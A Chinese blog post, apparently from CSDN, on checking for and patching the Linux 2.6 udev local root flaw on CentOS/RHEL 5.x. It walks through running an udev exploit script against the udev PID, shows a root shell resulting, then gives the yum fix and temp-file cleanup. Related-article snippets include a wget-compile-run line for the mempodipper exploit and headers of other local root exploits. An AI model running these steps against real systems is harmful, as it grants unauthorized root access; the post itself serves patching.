linux内核 漏洞扫描,关于Linux 2.6 kernel udev 漏洞的检测及修补

最新推荐文章于 2023-04-14 14:48:46 发布
最新推荐文章于 2023-04-14 14:48:46 发布
阅读量226 收藏
点赞数
文章标签: linux内核 漏洞扫描

最近闹的很凶的Linux udev漏洞对2.6系列的CentOS/RHEL 5.x(除了5.3)都有效,而对2.4系列的则无效,对于CentOS/RHEL 4.x 经过测试,按本文攻击方法无效,但是否真的无效还有待真正高手验证!请大家必须打起12分精神。赶紧升级。ExtMail团队已经将所有我们掌控的Linux服务器(2.6 kernel,5.x 系列)全部升级完毕。以下是检测方法和升级方法,请路过使用受影响的linux系统的朋友一定要参考并升级,否则很容易出问题。这次可以通过任意web程序来实现攻击,而且成功率几乎100%。

2)获得udev进程号

执行:ps ax|grep udev|grep -v grep|awk {'print $1'} 获得udev进程号,然后将此数字减1作为

exploit-udev-8478的参数,例如命令结果为143则参数为142

3)执行:

sh exploit-udev-8478 142

suid.c: In function ‘main’:

suid.c:3: warning: incompatible implicit declaration of built-in function ‘execl’

sh-3.1#

然后id 看看:

uid=0(root) gid=0(root) groups=65530(hzqbbc)

顺利获得root权限,如果无法获得root权限,要多执行脚本几次,一般第二次即可获得root权限。

解决/预防方法

唯一的就是要立刻升级udev软件包,此软件包升级后不需要重启动。方法很简单,请升级对应版本的官方最新udev,尤其要注意查看是否将这个漏洞补掉,EMOS用户可以很简单的用yum升级:

yum update udev

升级完毕后再用检测方法检测一遍以确保没有问题!强烈建议再重新做检测时,执行以下命令清除掉上一次入侵成功的临时文件,否则升级完也会攻击成功的。

以root权限执行:

引用:

rm -rf /tmp/libno_ex*

rm -rf /tmp/suid

rm -rf /tmp/udev0b1331709591d260c1c78e86d0c51c18.png

weixin_39629876
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux提权工具利用2.6内核漏洞
12-27
wunderbar_emporium-3.tgz linux提权工具 linux提权 2.6内核漏洞
Linux 2.6内核发现重大漏洞 可导致系统崩溃
coleq的专栏
11-01 1806
Linux软件供应商Novell日前提醒其SuSE用户,在Linux内核2.6中发现了重大安全漏洞,该漏洞可能导致系统崩溃。   众所周知,Linux内核2.6是于去年年底完成的。新版内核针对企业用户而增加了诸多特征。但同时也留下了不少安全隐患。   此次发现的重大安全漏洞存在于2.6内核对iptables防火墙登录时的处理方式。该漏洞只影响采用基于iptables的防火墙系统,如SuSE Fir
linux 2.6 内核漏洞,Linux 2.6.39 到 3.2.0 爆提权漏洞
weixin_36185435的博客
05-13 264
Linux 2.6.39 到 3.2.0 内核爆提权漏洞,普通用户可以通过运行特定代码获得 root 权限。重现方法:wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.ccc mempodipper.c./a.out在执行完毕后运行 whoami 来看是否执行成功。已知发行版情况:Debian Wheezy Testing: 成功。...
[zz]安全研究员发布针对Linux kernel 2.6 漏洞利用代码
weixin_30376163的博客
02-26 184
文章来源:milw0rm A researcher has released exploit codes for newly discovered Linux kernel 2.6 flaws which could permit attackers to gain root-system privileges they can use to steal data or mount ...
linux 2.6 cpu漏洞,[转载]Linux kernel 2.6.x udev 本地安全漏洞
weixin_39635648的博客
05-12 162
#!/bin/sh# Linux 2.6# bug found by Sebastian Krahmer## lame sploit using LD technique# by kcope in 2009# tested on debian-etch,ubuntu,gentoo# do a 'cat /proc/net/netlink'# and set the first arg to thi...
利用Udevlinux设备装载时实现易于识别的设备文件名.pdf
09-06
在 Ubuntu 12.04 LTS 中,UdevLinux kernel 2.6 的默认设备管理器,它的目标是接替 devfs 和 hotplug 的功能。Udev 规则易于在不同的发行版之间移植。Udev 的使用可以使得人们根据设备的不同属性区分设备,用...
Armlinux内核移植及系统初始化过程分析.pdf
11-09
(3) `/linux-2.6.18.8/arch/arm/kernel`目录包含了与ARM架构相关的内核核心代码,如中断处理、进程调度、系统调用等。在移植过程中,需要根据目标平台的特性调整或添加这部分代码。 (4) `/linux-2.6.18.8/arch/arm/...
嵌入式Linux_USB_U盘自动检测识别配置脚本.rar
08-20
Linux 2.6及以上内核版本中,udev(User-Mode Device Handler)系统被用来管理设备,包括自动检测和配置新插入的设备,如USB U盘。 udev是一个动态设备管理系统,它取代了早期的devfs和sysfs,负责为设备分配持久...
利用udev、sys动态创建linux设备结点
08-24
Linux 2.6 内核中,devfs 被认为是过时的方法,并最终被抛弃,udev 取代了它。udev 的一个很重要的特点就是可以动态创建设备结点。下面通过一个实例,说明 udev、sys 动态创建设备结点的方法。 首先,需要包含...
linux2.6.32漏洞,Linux内核 2.6.22 < 3.9 权限提升漏洞 - Dirty COW - 知道创宇 Seebug 漏洞平台...
weixin_30481539的博客
05-16 430
### SummaryA race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. All the information we have so far i...
centos6.10 RHSA-2019:0415漏洞修复(kernel-headers-2.6.32-754.11.1.el6.x86_64.rpm)
03-08
修复方法如下: rpm -Uvh kernel-headers-2.6.32-754.11.1.el6.x86_64.rpm 另外附上 rpm免费下载地址: https://rpmfind.net/linux/centos/6.10/updates/x86_64/Packages/kernel-headers-2.6.32-754.11.1.el6.x86_64.rpm
Linux2.6内核--内存管理(1)--分页机制
张勤一
08-22 2470
内核里分配内存可不像在其他地方分配内存那么容易。造成这种局面的因素很多。从根本上讲,是因为内核本身不能像用户空间那样奢侈的使用内存。内核与用户空间不同,它不具备这种能力,它不支持简单便捷的内存分配方式。比如,内核一般不能睡眠。此外,处理内存分配错误对于内核来说也绝非是一件简单的事。正式由于这些限制,再加上内存分配机制不能太复杂,所以在内核中获取内存要比在用户空间复杂的多。      首先,我们讨
linux畸形文件夹,Linux Kernel畸形报文处理拒绝服务漏洞
weixin_28902749的博客
04-28 188
Linux Kernel畸形报文处理拒绝服务漏洞2006-09-12eNet&Ciweek受影响系统:Linux kernel 2.6.x <= 2.6.17.7不受影响系统:Linux kernel 2.6.17.8描述:BUGTRAQ ID: 19939CVE(CAN) ID: CVE-2006-4623Linux Kernel是开放源码操作系统Linux所使用的内核。Linu...
linux各版本代码量,linux各版本对应溢出漏洞总结(溢出代码)
weixin_39980184的博客
05-03 136
记录一下。2.4.17newlocalkmod2.4.18brkbrk2newlocalkmodkm.22.4.19brkbrk2newlocalkmodkm.22.4.20ptracekmodptrace-kmodkm.2brkbrk22.4.21km.2brkbrk2ptraceptrace-kmod2.4.22km.2brk2brkptraceptrace-kmod2.4.22-10logi...
linux 2.6.32.9 漏洞,Linux 2.6.39到3.2.0爆提权漏洞
weixin_32954401的博客
05-16 184
Linux 2.6.39 到 3.2.0 内核爆提权漏洞,普通用户可以通过运行特定代码获得 root 权限。重现方法:wgetcc mempodipper.c./a.out在执行完毕后运行 whoami 来看是否执行成功。已知发行版情况:Debian Wheezy Testing: 成功。内核 3.1.0-1-amd64。Debian Security Tracker ReportFedora 1...
Linux内核权限提升漏洞
javagty6778的博客
01-11 113
get_pipe_inode()函数又调用alloc_pipe_info()函数分配一个pipe_inode_info,该结构体是一个内核pipe结构体,用于管道的管理和操作。当再次向管道中写入数据时,因为pipe非初次使用,首先判断要写入的buffer类型,如果buf->flags为PIPE_BUF_FLAG_CAN_MERGE,行466,直接调用copy_page_from_iter()函数进行内存拷贝,而目的地址为buf->page,这个buf->page实际上就是来自file中对应的内存页面。
linux3.x漏洞,Linux 2.6.37-3.x.x PERF_EVENTS - Local Root Exploit
weixin_31981135的博客
05-16 239
/** linux 2.6.37-3.x.x x86_64, ~100 LOC* gcc-4.6 -O2 semtex.c && ./a.out* 2010 sd@fucksheep.org, salut!** update may 2013:* seems like centos 2.6.32 backported the perf bug, lol.* jewgold to 1...
这是最新的0day Linux 2.4.x / 2.6.x umount exploit (已公开)
0ffs3t
10-26 1332
这算个最新的目标较多。今年1月的。 0day linux exploit jan 9th 2011 tested on latest centos5/5.5 and debian lenny  http://stablehost.us/exploits/umount should work on some other distributions exploits CIFS mount
Linux内核通杀提权漏洞CVE-2016-5195验证
2301_77512689的博客
04-14 349
2. 改漏洞允许攻击者使用本地账户修改磁盘上的二进制文件,绕过标准权限的限制,这些权限机制通常用于防止修改没有适当的权限集。CVE-2016-5195这个漏洞linux内核级的本地提权漏洞,原理是linux内核内存子系统在。文件权限也没出错,漏洞执行的过程中没有任何错误但是就是无法写入内容到指定文件中,原因可能是。1. 没有权限的本地用户可以使用此漏洞获取写访问权限,修改制度内存映射,从而提权。有些发行版系统的内核可能在受影响范围内,但是使用上述poc的时候,编译也没出错,
linux使用udev检测usb热插拔的代码例子
最新发布
05-19
下面是使用udev检测USB热插拔的代码示例: ```c #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <libudev.h> int main() { struct udev *udev = udev_new(); // 创建udev实例 if (!udev) { perror("udev_new"); exit(1); } struct udev_monitor *mon = udev_monitor_new_from_netlink(udev, "udev"); // 创建监视器,监听udev事件 udev_monitor_filter_add_match_subsystem_devtype(mon, "usb", NULL); // 监视usb设备 udev_monitor_enable_receiving(mon); // 开始接收udev事件 while (1) { fd_set fds; FD_ZERO(&fds); FD_SET(udev_monitor_get_fd(mon), &fds); // 将udev监视器的文件描述符加入到文件描述符集合中 // 等待事件的发生 if (select(udev_monitor_get_fd(mon) + 1, &fds, NULL, NULL, NULL) > 0) { if (FD_ISSET(udev_monitor_get_fd(mon), &fds)) { struct udev_device *dev = udev_monitor_receive_device(mon); // 获取udev事件对应的设备信息 if (dev) { const char *action = udev_device_get_action(dev); // 获取事件类型 const char *devnode = udev_device_get_devnode(dev); // 获取设备节点 const char *vendor = udev_device_get_property_value(dev, "ID_VENDOR_FROM_DATABASE"); // 获取设备的制造商信息 const char *product = udev_device_get_property_value(dev, "ID_MODEL_FROM_DATABASE"); // 获取设备的型号信息 printf("Action: %s\n", action); printf("Device Node Path: %s\n", devnode); printf("Vendor: %s\n", vendor); printf("Product: %s\n\n", product); udev_device_unref(dev); // 释放设备信息占用的资源 } } } } udev_monitor_unref(mon); // 释放udev监视器占用的资源 udev_unref(udev); // 释放udev实例占用的资源 return 0; } ``` 这个代码会不断地监听udev事件,当有USB设备插入或拔出时,就会打印出相应的信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值